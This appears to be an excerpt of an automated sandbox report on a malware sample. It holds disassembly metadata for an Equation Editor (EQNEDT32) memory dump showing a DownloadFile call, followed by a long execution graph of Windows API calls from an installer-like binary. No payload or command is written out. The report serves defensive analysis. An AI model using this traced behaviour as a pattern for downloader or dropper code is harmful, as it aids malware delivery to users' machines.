                                  • Snapshot File: hcaresult_2_2_3640000_EQNEDT32.jbxd
                                  Similarity
                                  • API ID: DownloadFile
                                  • String ID:
                                  • API String ID: 1407266417-0
                                  • Opcode ID: fe65dfc41c474ed7c68a25bdd3244d0e817b4e5dc4d84330f277ae402f48056e
                                  • Instruction ID: 84b85d0b8123664f15d8198fe8344fc2beb71cea498876c85127c1291265311e
                                  • Opcode Fuzzy Hash: fe65dfc41c474ed7c68a25bdd3244d0e817b4e5dc4d84330f277ae402f48056e
                                  • Instruction Fuzzy Hash: 2D114831E48342AAC720E654C951FEBFFB1EB82710F58C45AE5904F1C9E6E0D4C2CB29
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 036BBABB Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 100 36bbabb-36bbacd ExitProcess GetPEB 102 36bbad0-36bbae1 call 36bbaea 100->102 106 36bbae3-36bbae7 102->106
                                  APIs
                                  • ExitProcess.KERNELBASE(00000000,?,036BBAAF,?,036BBA93,?,036BBA59), ref: 036BBAC0
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.412621027.0000000003640000.00000004.00000020.00020000.00000000.sdmp, Offset: 03640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_3640000_EQNEDT32.jbxd
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID:
                                  • API String ID: 621844428-0
                                  • Opcode ID: e55ef30ae08b9a015fea4a6ff3e24b8599026409e8cd7a038f7e15e8fa1a622d
                                  • Instruction ID: 668c4c00513f67f6b41bdda02c2bbcf49589f0e09e15c7bc31e3afb50709913a
                                  • Opcode Fuzzy Hash: e55ef30ae08b9a015fea4a6ff3e24b8599026409e8cd7a038f7e15e8fa1a622d
                                  • Instruction Fuzzy Hash: B6D0C730201206DFD200EB10CD80F6BFB7AFFE4210F24C228E4044B209C770E881CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage:15.7%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:22.7%
                                  Total number of Nodes:1291
                                  Total number of Limit Nodes:23
                                  execution_graph 3656 404fc2 3657 404fe3 GetDlgItem GetDlgItem GetDlgItem 3656->3657 3658 40516e 3656->3658 3702 403e89 SendMessageA 3657->3702 3660 405177 GetDlgItem CreateThread CloseHandle 3658->3660 3661 40519f 3658->3661 3660->3661 3663 4051ca 3661->3663 3664 4051b6 ShowWindow ShowWindow 3661->3664 3665 4051ec 3661->3665 3662 405054 3668 40505b GetClientRect GetSystemMetrics SendMessageA SendMessageA 3662->3668 3666 405228 3663->3666 3670 405201 ShowWindow 3663->3670 3671 4051db 3663->3671 3704 403e89 SendMessageA 3664->3704 3667 403ebb 8 API calls 3665->3667 3666->3665 3677 405233 SendMessageA 3666->3677 3672 4051fa 3667->3672 3675 4050ca 3668->3675 3676 4050ae SendMessageA SendMessageA 3668->3676 3673 405221 3670->3673 3674 405213 3670->3674 3678 403e2d SendMessageA 3671->3678 3680 403e2d SendMessageA 3673->3680 3679 404e84 25 API calls 3674->3679 3681 4050dd 3675->3681 3682 4050cf SendMessageA 3675->3682 3676->3675 3677->3672 3683 40524c CreatePopupMenu 3677->3683 3678->3665 3679->3673 3680->3666 3685 403e54 19 API calls 3681->3685 3682->3681 3684 405bba 18 API calls 3683->3684 3686 40525c AppendMenuA 3684->3686 3687 4050ed 3685->3687 3688 405282 3686->3688 3689 40526f GetWindowRect 3686->3689 3690 4050f6 ShowWindow 3687->3690 3691 40512a GetDlgItem SendMessageA 3687->3691 3692 40528b TrackPopupMenu 3688->3692 3689->3692 3693 405119 3690->3693 3694 40510c ShowWindow 3690->3694 3691->3672 3695 405151 SendMessageA SendMessageA 3691->3695 3692->3672 3696 4052a9 3692->3696 3703 403e89 SendMessageA 3693->3703 3694->3693 3695->3672 3697 4052c5 SendMessageA 3696->3697 3697->3697 3699 4052e2 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3697->3699 3700 405304 SendMessageA 3699->3700 3700->3700 3701 405325 GlobalUnlock SetClipboardData CloseClipboard 3700->3701 3701->3672 3702->3662 3703->3691 3704->3663 3705 401cc2 3709 402a0c 3705->3709 3707 401cd2 SetWindowLongA 3708 4028be 3707->3708 3710 405bba 18 API calls 3709->3710 3711 402a20 3710->3711 3711->3707 3712 401a43 3713 402a0c 18 API calls 3712->3713 3714 401a49 3713->3714 3715 402a0c 18 API calls 3714->3715 3716 4019f3 3715->3716 3724 402648 3725 40264b 3724->3725 3728 402663 3724->3728 3726 402658 FindNextFileA 3725->3726 3727 4026a2 3726->3727 3726->3728 3730 405b98 lstrcpynA 3727->3730 3730->3728 3734 401bca 3735 402a0c 18 API calls 3734->3735 3736 401bd1 3735->3736 3737 402a0c 18 API calls 3736->3737 3738 401bdb 3737->3738 3739 401beb 3738->3739 3740 402a29 18 API calls 3738->3740 3741 401bfb 3739->3741 3742 402a29 18 API calls 3739->3742 3740->3739 3743 401c06 3741->3743 3744 401c4a 3741->3744 3742->3741 3745 402a0c 18 API calls 3743->3745 3746 402a29 18 API calls 3744->3746 3747 401c0b 3745->3747 3748 401c4f 3746->3748 3749 402a0c 18 API calls 3747->3749 3750 402a29 18 API calls 3748->3750 3751 401c14 3749->3751 3752 401c58 FindWindowExA 3750->3752 3753 401c3a SendMessageA 3751->3753 3754 401c1c SendMessageTimeoutA 3751->3754 3755 401c76 3752->3755 3753->3755 3754->3755 3756 40424b 3757 404281 3756->3757 3758 40425b 3756->3758 3760 403ebb 8 API calls 3757->3760 3759 403e54 19 API calls 3758->3759 3761 404268 SetDlgItemTextA 3759->3761 3762 40428d 3760->3762 3761->3757 3763 4024cf 3764 402a29 18 API calls 3763->3764 3765 4024d6 3764->3765 3768 40586f GetFileAttributesA CreateFileA 3765->3768 3767 4024e2 3768->3767 2984 401751 3022 402a29 2984->3022 2986 401758 2987 401776 2986->2987 2988 40177e 2986->2988 3071 405b98 lstrcpynA 2987->3071 3072 405b98 lstrcpynA 2988->3072 2991 40177c 3028 405dfa 2991->3028 2992 401789 3073 40568b lstrlenA CharPrevA 2992->3073 2999 4017b2 CompareFileTime 3017 40179b 2999->3017 3000 401876 3038 404e84 3000->3038 3001 40184d 3003 404e84 25 API calls 3001->3003 3011 401862 3001->3011 3003->3011 3007 4018a7 SetFileTime 3008 4018b9 CloseHandle 3007->3008 3010 4018ca 3008->3010 3008->3011 3012 4018e2 3010->3012 3013 4018cf 3010->3013 3016 405bba 18 API calls 3012->3016 3015 405bba 18 API calls 3013->3015 3014 405b98 lstrcpynA 3014->3017 3018 4018d7 lstrcatA 3015->3018 3019 4018ea 3016->3019 3017->2999 3017->3000 3017->3001 3017->3014 3037 40586f GetFileAttributesA CreateFileA 3017->3037 3076 405e93 FindFirstFileA 3017->3076 3079 405850 GetFileAttributesA 3017->3079 3082 405bba 3017->3082 3101 405459 3017->3101 3018->3019 3021 405459 MessageBoxIndirectA 3019->3021 3021->3011 3023 402a35 3022->3023 3024 405bba 18 API calls 3023->3024 3025 402a56 3024->3025 3026 402a62 3025->3026 3027 405dfa 5 API calls 3025->3027 3026->2986 3027->3026 3035 405e06 3028->3035 3029 405e6e 3030 405e72 CharPrevA 3029->3030 3033 405e8d 3029->3033 3030->3029 3031 405e63 CharNextA 3031->3029 3031->3035 3033->3017 3034 405e51 CharNextA 3034->3035 3035->3029 3035->3031 3035->3034 3036 405e5e CharNextA 3035->3036 3105 4056b6 3035->3105 3036->3031 3037->3017 3039 404e9f 3038->3039 3047 401880 3038->3047 3040 404ebc lstrlenA 3039->3040 3041 405bba 18 API calls 3039->3041 3042 404ee5 3040->3042 3043 404eca lstrlenA 3040->3043 3041->3040 3045 404ef8 3042->3045 3046 404eeb SetWindowTextA 3042->3046 3044 404edc lstrcatA 3043->3044 3043->3047 3044->3042 3045->3047 3048 404efe SendMessageA SendMessageA SendMessageA 3045->3048 3046->3045 3049 402e8e 3047->3049 3048->3047 3050 402ea4 3049->3050 3051 402ecf 3050->3051 3118 4030b3 SetFilePointer 3050->3118 3109 403081 ReadFile 3051->3109 3055 403015 3057 403019 3055->3057 3058 403031 3055->3058 3056 402eec GetTickCount 3059 402eff 3056->3059 3060 403081 ReadFile 3057->3060 3061 403081 ReadFile 3058->3061 3062 401893 3058->3062 3064 40304c WriteFile 3058->3064 3059->3062 3063 403081 ReadFile 3059->3063 3067 402f65 GetTickCount 3059->3067 3068 402f8e MulDiv wsprintfA 3059->3068 3070 402fcc WriteFile 3059->3070 3111 406025 3059->3111 3060->3062 3061->3058 3062->3007 3062->3008 3063->3059 3064->3062 3065 403061 3064->3065 3065->3058 3065->3062 3067->3059 3069 404e84 25 API calls 3068->3069 3069->3059 3070->3059 3070->3062 3071->2991 3072->2992 3074 40178f lstrcatA 3073->3074 3075 4056a5 lstrcatA 3073->3075 3074->2991 3075->3074 3077 405eb4 3076->3077 3078 405ea9 FindClose 3076->3078 3077->3017 3078->3077 3080 40586c 3079->3080 3081 40585f SetFileAttributesA 3079->3081 3080->3017 3081->3080 3087 405bc7 3082->3087 3083 405de1 3084 405df6 3083->3084 3126 405b98 lstrcpynA 3083->3126 3084->3017 3086 405c5f GetVersion 3094 405c6c 3086->3094 3087->3083 3087->3086 3088 405db8 lstrlenA 3087->3088 3090 405bba 10 API calls 3087->3090 3096 405dfa 5 API calls 3087->3096 3124 405af6 wsprintfA 3087->3124 3125 405b98 lstrcpynA 3087->3125 3088->3087 3090->3088 3093 405cd7 GetSystemDirectoryA 3093->3094 3094->3087 3094->3093 3095 405cea GetWindowsDirectoryA 3094->3095 3097 405bba 10 API calls 3094->3097 3098 405d61 lstrcatA 3094->3098 3099 405d1e SHGetSpecialFolderLocation 3094->3099 3119 405a7f RegOpenKeyExA 3094->3119 3095->3094 3096->3087 3097->3094 3098->3087 3099->3094 3100 405d36 SHGetPathFromIDListA CoTaskMemFree 3099->3100 3100->3094 3102 40546e 3101->3102 3103 4054ba 3102->3103 3104 405482 MessageBoxIndirectA 3102->3104 3103->3017 3104->3103 3106 4056bc 3105->3106 3107 4056cf 3106->3107 3108 4056c2 CharNextA 3106->3108 3107->3035 3108->3106 3110 402eda 3109->3110 3110->3055 3110->3056 3110->3062 3112 40604a 3111->3112 3113 406052 3111->3113 3112->3059 3113->3112 3114 4060e2 GlobalAlloc 3113->3114 3115 4060d9 GlobalFree 3113->3115 3116 406150 GlobalFree 3113->3116 3117 406159 GlobalAlloc 3113->3117 3114->3112 3114->3113 3115->3114 3116->3117 3117->3112 3117->3113 3118->3051 3120 405af0 3119->3120 3121 405ab2 RegQueryValueExA 3119->3121 3120->3094 3122 405ad3 RegCloseKey 3121->3122 3122->3120 3124->3087 3125->3087 3126->3084 3769 401651 3770 402a29 18 API calls 3769->3770 3771 401657 3770->3771 3772 405e93 2 API calls 3771->3772 3773 40165d 3772->3773 3774 401951 3775 402a0c 18 API calls 3774->3775 3776 401958 3775->3776 3777 402a0c 18 API calls 3776->3777 3778 401962 3777->3778 3779 402a29 18 API calls 3778->3779 3780 40196b 3779->3780 3781 40197e lstrlenA 3780->3781 3782 4019b9 3780->3782 3783 401988 3781->3783 3783->3782 3787 405b98 lstrcpynA 3783->3787 3785 4019a2 3785->3782 3786 4019af lstrlenA 3785->3786 3786->3782 3787->3785 3788 4019d2 3789 402a29 18 API calls 3788->3789 3790 4019d9 3789->3790 3791 402a29 18 API calls 3790->3791 3792 4019e2 3791->3792 3793 4019e9 lstrcmpiA 3792->3793 3794 4019fb lstrcmpA 3792->3794 3795 4019ef 3793->3795 3794->3795 3796 402053 3797 402a29 18 API calls 3796->3797 3798 40205a 3797->3798 3799 402a29 18 API calls 3798->3799 3800 402064 3799->3800 3801 402a29 18 API calls 3800->3801 3802 40206d 3801->3802 3803 402a29 18 API calls 3802->3803 3804 402077 3803->3804 3805 402a29 18 API calls 3804->3805 3807 402081 3805->3807 3806 402095 CoCreateInstance 3809 40216a 3806->3809 3812 4020b4 3806->3812 3807->3806 3808 402a29 18 API calls 3807->3808 3808->3806 3810 401423 25 API calls 3809->3810 3811 40219c 3809->3811 3810->3811 3812->3809 3813 402149 MultiByteToWideChar 3812->3813 3813->3809 3814 4047d3 GetDlgItem GetDlgItem 3815 404827 7 API calls 3814->3815 3823 404a44 3814->3823 3816 4048c0 SendMessageA 3815->3816 3817 4048cd DeleteObject 3815->3817 3816->3817 3818 4048d8 3817->3818 3820 40490f 3818->3820 3822 405bba 18 API calls 3818->3822 3819 404b2e 3821 404bdd 3819->3821 3825 404a37 3819->3825 3830 404b87 SendMessageA 3819->3830 3824 403e54 19 API calls 3820->3824 3826 404bf2 3821->3826 3827 404be6 SendMessageA 3821->3827 3828 4048f1 SendMessageA SendMessageA 3822->3828 3823->3819 3846 404ab8 3823->3846 3867 404753 SendMessageA 3823->3867 3829 404923 3824->3829 3831 403ebb 8 API calls 3825->3831 3838 404c04 ImageList_Destroy 3826->3838 3839 404c0b 3826->3839 3843 404c1b 3826->3843 3827->3826 3828->3818 3834 403e54 19 API calls 3829->3834 3830->3825 3836 404b9c SendMessageA 3830->3836 3837 404dcd 3831->3837 3832 404b20 SendMessageA 3832->3819 3847 404931 3834->3847 3835 404d81 3835->3825 3844 404d93 ShowWindow GetDlgItem ShowWindow 3835->3844 3841 404baf 3836->3841 3838->3839 3842 404c14 GlobalFree 3839->3842 3839->3843 3840 404a05 GetWindowLongA SetWindowLongA 3845 404a1e 3840->3845 3853 404bc0 SendMessageA 3841->3853 3842->3843 3843->3835 3852 40140b 2 API calls 3843->3852 3861 404c4d 3843->3861 3844->3825 3848 404a24 ShowWindow 3845->3848 3849 404a3c 3845->3849 3846->3819 3846->3832 3847->3840 3851 404980 SendMessageA 3847->3851 3854 4049ff 3847->3854 3856 4049bc SendMessageA 3847->3856 3857 4049cd SendMessageA 3847->3857 3865 403e89 SendMessageA 3848->3865 3866 403e89 SendMessageA 3849->3866 3851->3847 3852->3861 3853->3821 3854->3840 3854->3845 3856->3847 3857->3847 3858 404d57 InvalidateRect 3858->3835 3859 404d6d 3858->3859 3872 40470e 3859->3872 3860 404c7b SendMessageA 3864 404c91 3860->3864 3861->3860 3861->3864 3863 404d05 SendMessageA SendMessageA 3863->3864 3864->3858 3864->3863 3865->3825 3866->3823 3868 4047b2 SendMessageA 3867->3868 3869 404776 GetMessagePos ScreenToClient SendMessageA 3867->3869 3870 4047aa 3868->3870 3869->3870 3871 4047af 3869->3871 3870->3846 3871->3868 3875 404649 3872->3875 3874 404723 3874->3835 3876 40465f 3875->3876 3877 405bba 18 API calls 3876->3877 3878 4046c3 3877->3878 3879 405bba 18 API calls 3878->3879 3880 4046ce 3879->3880 3881 405bba 18 API calls 3880->3881 3882 4046e4 lstrlenA wsprintfA SetDlgItemTextA 3881->3882 3882->3874 3883 404dd4 3884 404de2 3883->3884 3885 404df9 3883->3885 3886 404de8 3884->3886 3901 404e62 3884->3901 3887 404e07 IsWindowVisible 3885->3887 3890 404e1e 3885->3890 3891 403ea0 SendMessageA 3886->3891 3889 404e14 3887->3889 3887->3901 3888 404e68 CallWindowProcA 3892 404df2 3888->3892 3893 404753 5 API calls 3889->3893 3890->3888 3902 405b98 lstrcpynA 3890->3902 3891->3892 3893->3890 3895 404e4d 3903 405af6 wsprintfA 3895->3903 3897 404e54 3898 40140b 2 API calls 3897->3898 3899 404e5b 3898->3899 3904 405b98 lstrcpynA 3899->3904 3901->3888 3902->3895 3903->3897 3904->3901 3905 4061d4 3911 406058 3905->3911 3906 4069c3 3907 4060e2 GlobalAlloc 3907->3906 3907->3911 3908 4060d9 GlobalFree 3908->3907 3909 406150 GlobalFree 3910 406159 GlobalAlloc 3909->3910 3910->3906 3910->3911 3911->3906 3911->3907 3911->3908 3911->3909 3911->3910 3912 402256 3913 40225e 3912->3913 3918 402264 3912->3918 3914 402a29 18 API calls 3913->3914 3914->3918 3915 402a29 18 API calls 3917 402274 3915->3917 3916 402282 3920 402a29 18 API calls 3916->3920 3917->3916 3919 402a29 18 API calls 3917->3919 3918->3915 3918->3917 3919->3916 3921 40228b WritePrivateProfileStringA 3920->3921 3922 4014d6 3923 402a0c 18 API calls 3922->3923 3924 4014dc Sleep 3923->3924 3926 4028be 3924->3926 3927 40245a 3937 402b33 3927->3937 3929 402464 3930 402a0c 18 API calls 3929->3930 3931 40246d 3930->3931 3932 402490 RegEnumValueA 3931->3932 3933 402484 RegEnumKeyA 3931->3933 3935 40268f 3931->3935 3934 4024a9 RegCloseKey 3932->3934 3932->3935 3933->3934 3934->3935 3938 402a29 18 API calls 3937->3938 3939 402b4c 3938->3939 3940 402b5a RegOpenKeyExA 3939->3940 3940->3929 3941 4022da 3942 40230a 3941->3942 3943 4022df 3941->3943 3945 402a29 18 API calls 3942->3945 3944 402b33 19 API calls 3943->3944 3946 4022e6 3944->3946 3947 402311 3945->3947 3948 402a29 18 API calls 3946->3948 3951 402327 3946->3951 3952 402a69 RegOpenKeyExA 3947->3952 3950 4022f7 RegDeleteValueA RegCloseKey 3948->3950 3950->3951 3957 402a94 3952->3957 3961 402ae0 3952->3961 3953 402aba RegEnumKeyA 3954 402acc RegCloseKey 3953->3954 3953->3957 3955 405f28 5 API calls 3954->3955 3958 402adc 3955->3958 3956 402af1 RegCloseKey 3956->3961 3957->3953 3957->3954 3957->3956 3959 402a69 5 API calls 3957->3959 3960 402b0c RegDeleteKeyA 3958->3960 3958->3961 3959->3957 3960->3961 3961->3951 3962 40155b 3963 401565 3962->3963 3964 401577 ShowWindow 3963->3964 3965 40157e 3963->3965 3964->3965 3966 40158c ShowWindow 3965->3966 3967 4028be 3965->3967 3966->3967 3975 401cde GetDlgItem GetClientRect 3976 402a29 18 API calls 3975->3976 3977 401d0e LoadImageA SendMessageA 3976->3977 3978 401d2c DeleteObject 3977->3978 3979 4028be 3977->3979 3978->3979 3980 401dde 3981 402a29 18 API calls 3980->3981 3982 401de4 3981->3982 3983 402a29 18 API calls 3982->3983 3984 401ded 3983->3984 3985 402a29 18 API calls 3984->3985 3986 401df6 3985->3986 3987 402a29 18 API calls 3986->3987 3988 401dff 3987->3988 3989 401423 25 API calls 3988->3989 3990 401e06 ShellExecuteA 3989->3990 3991 401e33 3990->3991 3992 401662 3993 402a29 18 API calls 3992->3993 3994 401669 3993->3994 3995 402a29 18 API calls 3994->3995 3996 401672 3995->3996 3997 402a29 18 API calls 3996->3997 3998 40167b MoveFileA 3997->3998 3999 40168e 3998->3999 4005 401687 3998->4005 4001 405e93 2 API calls 3999->4001 4003 40219c 3999->4003 4000 401423 25 API calls 4000->4003 4002 40169d 4001->4002 4002->4003 4004 4058e6 40 API calls 4002->4004 4004->4005 4005->4000 4006 401ee2 4007 402a29 18 API calls 4006->4007 4008 401ee9 4007->4008 4009 405f28 5 API calls 4008->4009 4010 401ef8 4009->4010 4011 401f10 GlobalAlloc 4010->4011 4016 401f78 4010->4016 4012 401f24 4011->4012 4011->4016 4013 405f28 5 API calls 4012->4013 4014 401f2b 4013->4014 4015 405f28 5 API calls 4014->4015 4017 401f35 4015->4017 4017->4016 4021 405af6 wsprintfA 4017->4021 4019 401f6c 4022 405af6 wsprintfA 4019->4022 4021->4019 4022->4016 4023 4023e2 4024 402b33 19 API calls 4023->4024 4025 4023ec 4024->4025 4026 402a29 18 API calls 4025->4026 4027 4023f5 4026->4027 4028 4023ff RegQueryValueExA 4027->4028 4033 40268f 4027->4033 4029 40241f 4028->4029 4030 402425 RegCloseKey 4028->4030 4029->4030 4034 405af6 wsprintfA 4029->4034 4030->4033 4034->4030 4035 4045e3 4036 4045f3 4035->4036 4037 40460f 4035->4037 4046 40543d GetDlgItemTextA 4036->4046 4039 404642 4037->4039 4040 404615 SHGetPathFromIDListA 4037->4040 4042 40462c SendMessageA 4040->4042 4043 404625 4040->4043 4041 404600 SendMessageA 4041->4037 4042->4039 4044 40140b 2 API calls 4043->4044 4044->4042 4046->4041 4047 403f68 lstrcpynA lstrlenA 4048 402b6e 4049 402b7d SetTimer 4048->4049 4051 402b96 4048->4051 4049->4051 4050 402beb 4051->4050 4052 402bb0 MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 4051->4052 4052->4050 4053 4014f0 SetForegroundWindow 4054 4028be 4053->4054 4055 402671 4056 402a29 18 API calls 4055->4056 4057 402678 FindFirstFileA 4056->4057 4058 40269b 4057->4058 4059 40268b 4057->4059 4060 4026a2 4058->4060 4063 405af6 wsprintfA 4058->4063 4064 405b98 lstrcpynA 4060->4064 4063->4060 4064->4059 4065 4024f1 4066 4024f6 4065->4066 4067 402507 4065->4067 4069 402a0c 18 API calls 4066->4069 4068 402a29 18 API calls 4067->4068 4070 40250e lstrlenA 4068->4070 4071 4024fd 4069->4071 4070->4071 4072 40252d WriteFile 4071->4072 4073 40268f 4071->4073 4072->4073 4086 4018f5 4087 40192c 4086->4087 4088 402a29 18 API calls 4087->4088 4089 401931 4088->4089 4090 4054bd 70 API calls 4089->4090 4091 40193a 4090->4091 4092 4018f8 4093 402a29 18 API calls 4092->4093 4094 4018ff 4093->4094 4095 405459 MessageBoxIndirectA 4094->4095 4096 401908 4095->4096 3420 4030fb SetErrorMode GetVersion 3421 403133 3420->3421 3422 403139 3420->3422 3423 405f28 5 API calls 3421->3423 3424 405eba 3 API calls 3422->3424 3423->3422 3425 40314f lstrlenA 3424->3425 3425->3422 3426 40315e 3425->3426 3427 405f28 5 API calls 3426->3427 3428 403165 3427->3428 3429 405f28 5 API calls 3428->3429 3430 40316c #17 OleInitialize SHGetFileInfoA 3429->3430 3510 405b98 lstrcpynA 3430->3510 3432 4031a9 GetCommandLineA 3511 405b98 lstrcpynA 3432->3511 3434 4031bb GetModuleHandleA 3435 4031d2 3434->3435 3436 4056b6 CharNextA 3435->3436 3437 4031e6 CharNextA 3436->3437 3443 4031f3 3437->3443 3438 403260 3439 403273 GetTempPathA 3438->3439 3512 4030ca 3439->3512 3441 403289 3444 4032b1 DeleteFileA 3441->3444 3445 40328d GetWindowsDirectoryA lstrcatA 3441->3445 3442 4056b6 CharNextA 3442->3443 3443->3438 3443->3442 3449 403262 3443->3449 3522 402c55 GetTickCount GetModuleFileNameA 3444->3522 3447 4030ca 12 API calls 3445->3447 3448 4032a9 3447->3448 3448->3444 3451 403332 ExitProcess OleUninitialize 3448->3451 3606 405b98 lstrcpynA 3449->3606 3450 4032c5 3450->3451 3453 40331e 3450->3453 3457 4056b6 CharNextA 3450->3457 3454 403456 3451->3454 3455 403347 3451->3455 3550 4035eb 3453->3550 3459 4034f9 ExitProcess 3454->3459 3464 405f28 5 API calls 3454->3464 3458 405459 MessageBoxIndirectA 3455->3458 3461 4032dc 3457->3461 3463 403355 ExitProcess 3458->3463 3460 40332e 3460->3451 3468 4032f9 3461->3468 3469 40335d 3461->3469 3465 403469 3464->3465 3466 405f28 5 API calls 3465->3466 3467 403472 3466->3467 3470 405f28 5 API calls 3467->3470 3472 40576c 18 API calls 3468->3472 3471 4053e0 5 API calls 3469->3471 3473 40347b 3470->3473 3474 403362 lstrcatA 3471->3474 3475 403304 3472->3475 3476 403499 3473->3476 3485 403489 GetCurrentProcess 3473->3485 3477 403373 lstrcatA 3474->3477 3478 40337e lstrcatA lstrcmpiA 3474->3478 3475->3451 3607 405b98 lstrcpynA 3475->3607 3481 405f28 5 API calls 3476->3481 3477->3478 3478->3451 3479 40339a 3478->3479 3482 4033a6 3479->3482 3483 40339f 3479->3483 3486 4034d0 3481->3486 3490 4053c3 2 API calls 3482->3490 3488 405346 4 API calls 3483->3488 3484 403313 3608 405b98 lstrcpynA 3484->3608 3485->3476 3487 4034e5 ExitWindowsEx 3486->3487 3492 4034f2 3486->3492 3487->3459 3487->3492 3491 4033a4 3488->3491 3493 4033ab SetCurrentDirectoryA 3490->3493 3491->3493 3494 40140b 2 API calls 3492->3494 3495 4033c5 3493->3495 3496 4033ba 3493->3496 3494->3459 3610 405b98 lstrcpynA 3495->3610 3609 405b98 lstrcpynA 3496->3609 3499 4033d3 3500 405bba 18 API calls 3499->3500 3503 40344a 3499->3503 3504 4058e6 40 API calls 3499->3504 3507 405bba 18 API calls 3499->3507 3508 4053f8 2 API calls 3499->3508 3509 403436 CloseHandle 3499->3509 3501 4033f5 DeleteFileA 3500->3501 3501->3499 3502 403402 CopyFileA 3501->3502 3502->3499 3505 4058e6 40 API calls 3503->3505 3504->3499 3506 403451 3505->3506 3506->3451 3507->3499 3508->3499 3509->3499 3510->3432 3511->3434 3513 405dfa 5 API calls 3512->3513 3515 4030d6 3513->3515 3514 4030e0 3514->3441 3515->3514 3516 40568b 3 API calls 3515->3516 3517 4030e8 3516->3517 3518 4053c3 2 API calls 3517->3518 3519 4030ee 3518->3519 3611 40589e 3519->3611 3615 40586f GetFileAttributesA CreateFileA 3522->3615 3524 402c95 3544 402ca5 3524->3544 3616 405b98 lstrcpynA 3524->3616 3526 402cbb 3527 4056d2 2 API calls 3526->3527 3528 402cc1 3527->3528 3617 405b98 lstrcpynA 3528->3617 3530 402ccc GetFileSize 3531 402ce3 3530->3531 3547 402dc8 3530->3547 3534 403081 ReadFile 3531->3534 3537 402e34 3531->3537 3531->3544 3546 402bf1 6 API calls 3531->3546 3531->3547 3533 402dd1 3535 402e01 GlobalAlloc 3533->3535 3533->3544 3629 4030b3 SetFilePointer 3533->3629 3534->3531 3630 4030b3 SetFilePointer 3535->3630 3541 402bf1 6 API calls 3537->3541 3539 402dea 3542 403081 ReadFile 3539->3542 3540 402e1c 3543 402e8e 37 API calls 3540->3543 3541->3544 3545 402df5 3542->3545 3548 402e28 3543->3548 3544->3450 3545->3535 3545->3544 3546->3531 3618 402bf1 3547->3618 3548->3544 3549 402e65 SetFilePointer 3548->3549 3549->3544 3551 405f28 5 API calls 3550->3551 3552 4035ff 3551->3552 3553 403617 3552->3553 3555 403605 3552->3555 3554 405a7f 3 API calls 3553->3554 3556 403638 3554->3556 3640 405af6 wsprintfA 3555->3640 3558 403656 lstrcatA 3556->3558 3560 405a7f 3 API calls 3556->3560 3559 403615 3558->3559 3631 4038b4 3559->3631 3560->3558 3563 40576c 18 API calls 3564 403688 3563->3564 3565 403711 3564->3565 3567 405a7f 3 API calls 3564->3567 3566 40576c 18 API calls 3565->3566 3568 403717 3566->3568 3569 4036b4 3567->3569 3570 403727 LoadImageA 3568->3570 3571 405bba 18 API calls 3568->3571 3569->3565 3574 4036d0 lstrlenA 3569->3574 3578 4056b6 CharNextA 3569->3578 3572 403752 RegisterClassA 3570->3572 3573 4037db 3570->3573 3571->3570 3575 4037e5 3572->3575 3576 40378e SystemParametersInfoA CreateWindowExA 3572->3576 3577 40140b 2 API calls 3573->3577 3579 403704 3574->3579 3580 4036de lstrcmpiA 3574->3580 3575->3460 3576->3573 3581 4037e1 3577->3581 3583 4036ce 3578->3583 3582 40568b 3 API calls 3579->3582 3580->3579 3584 4036ee GetFileAttributesA 3580->3584 3581->3575 3585 4038b4 19 API calls 3581->3585 3586 40370a 3582->3586 3583->3574 3587 4036fa 3584->3587 3588 4037f2 3585->3588 3641 405b98 lstrcpynA 3586->3641 3587->3579 3590 4056d2 2 API calls 3587->3590 3591 403881 3588->3591 3592 4037fe ShowWindow 3588->3592 3590->3579 3642 404f56 OleInitialize 3591->3642 3594 405eba 3 API calls 3592->3594 3596 403816 3594->3596 3595 403887 3597 4038a3 3595->3597 3598 40388b 3595->3598 3599 403824 GetClassInfoA 3596->3599 3601 405eba 3 API calls 3596->3601 3600 40140b 2 API calls 3597->3600 3598->3575 3604 40140b 2 API calls 3598->3604 3602 403838 GetClassInfoA RegisterClassA 3599->3602 3603 40384e DialogBoxParamA 3599->3603 3600->3575 3601->3599 3602->3603 3605 40140b 2 API calls 3603->3605 3604->3575 3605->3575 3606->3439 3607->3484 3608->3453 3609->3495 3610->3499 3612 4058a9 GetTickCount GetTempFileNameA 3611->3612 3613 4058d5 3612->3613 3614 4030f9 3612->3614 3613->3612 3613->3614 3614->3441 3615->3524 3616->3526 3617->3530 3619 402c12 3618->3619 3620 402bfa 3618->3620 3623 402c22 GetTickCount 3619->3623 3624 402c1a 3619->3624 3621 402c03 DestroyWindow 3620->3621 3622 402c0a 3620->3622 3621->3622 3622->3533 3626 402c30 CreateDialogParamA ShowWindow 3623->3626 3627 402c53 3623->3627 3625 405f64 2 API calls 3624->3625 3628 402c20 3625->3628 3626->3627 3627->3533 3628->3533 3629->3539 3630->3540 3632 4038c8 3631->3632 3649 405af6 wsprintfA 3632->3649 3634 403939 3635 405bba 18 API calls 3634->3635 3636 403945 SetWindowTextA 3635->3636 3637 403961 3636->3637 3638 403666 3636->3638 3637->3638 3639 405bba 18 API calls 3637->3639 3638->3563 3639->3637 3640->3559 3641->3565 3643 403ea0 SendMessageA 3642->3643 3644 404f79 3643->3644 3647 401389 2 API calls 3644->3647 3648 404fa0 3644->3648 3645 403ea0 SendMessageA 3646 404fb2 OleUninitialize 3645->3646 3646->3595 3647->3644 3648->3645 3649->3634 4097 4014fe 4098 401506 4097->4098 4100 401519 4097->4100 4099 402a0c 18 API calls 4098->4099 4099->4100 4101 4025ff 4102 402606 4101->4102 4103 40286b 4101->4103 4104 402a0c 18 API calls 4102->4104 4105 402611 4104->4105 4106 402618 SetFilePointer 4105->4106 4106->4103 4107 402628 4106->4107 4109 405af6 wsprintfA 4107->4109 4109->4103 4110 401000 4111 401037 BeginPaint GetClientRect 4110->4111 4113 40100c DefWindowProcA 4110->4113 4114 4010f3 4111->4114 4117 401179 4113->4117 4115 401073 CreateBrushIndirect FillRect DeleteObject 4114->4115 4116 4010fc 4114->4116 4115->4114 4118 401102 CreateFontIndirectA 4116->4118 4119 401167 EndPaint 